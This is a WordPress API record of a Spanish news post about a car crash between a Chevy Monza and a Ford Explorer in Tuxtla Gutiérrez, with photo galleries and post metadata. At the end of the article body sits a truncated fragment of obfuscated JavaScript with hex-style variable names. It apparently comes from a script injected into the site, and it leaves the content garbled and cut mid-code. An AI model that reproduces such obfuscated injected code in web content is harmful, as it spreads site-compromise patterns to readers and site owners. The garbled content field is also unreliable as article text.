{"id":15774,"date":"2024-05-24T04:05:30","date_gmt":"2024-05-24T04:05:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15774"},"modified":"2024-05-24T04:05:31","modified_gmt":"2024-05-24T04:05:31","slug":"colisionan-chevy-y-una-explorer-en-la-zona-oriente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15774","title":{"rendered":"Colisionan Chevy y una Explorer en la zona Oriente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15775\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522741475-1024x576.jpg\" alt=\"\" class=\"wp-image-15775\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522741475-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522741475-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522741475-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522741475.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15776\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522744299-1024x576.jpg\" alt=\"\" class=\"wp-image-15776\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522744299-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522744299-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522744299-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522744299.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15777\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522738684-1024x576.jpg\" alt=\"\" class=\"wp-image-15777\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522738684-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522738684-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522738684-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716522738684.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 23 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la noche se registr\u00f3 un fuerte choque entre un veh\u00edculo Chevy Monza y una Ford Explorer, a la altura del Bulevar Presa Chicoas\u00e9n y Avenida Presa Palmita.<\/p>\n\n\n\n<p>Los primeros reportes oficiales informaron que, el compacto circulaba en el Bulevar y al llegar a la Avenida se impact\u00f3 de manera frontal y por el golpe gir\u00f3 80 grados.<\/p>\n\n\n\n<p>El conductor del Chevi sali\u00f3 proyectado y quebr\u00f3 el parabrisas con la cabeza.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos para atender al lesionado pero no fue trasladado a un nosocomio.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito municipal y ordenaron el levantamiento de las unidades para llevarlas a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 23 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la noche se registr\u00f3 un fuerte choque entre un veh\u00edculo Chevy Monza y una Ford Explorer, a la altura del Bulevar Presa Chicoas\u00e9n y Avenida Presa Palmita. Los primeros reportes oficiales informaron que, el compacto circulaba en el Bulevar y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15776,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15774","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15774","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15774"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15774\/revisions"}],"predecessor-version":[{"id":15778,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15774\/revisions\/15778"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15776"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15774"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15774"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15774"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}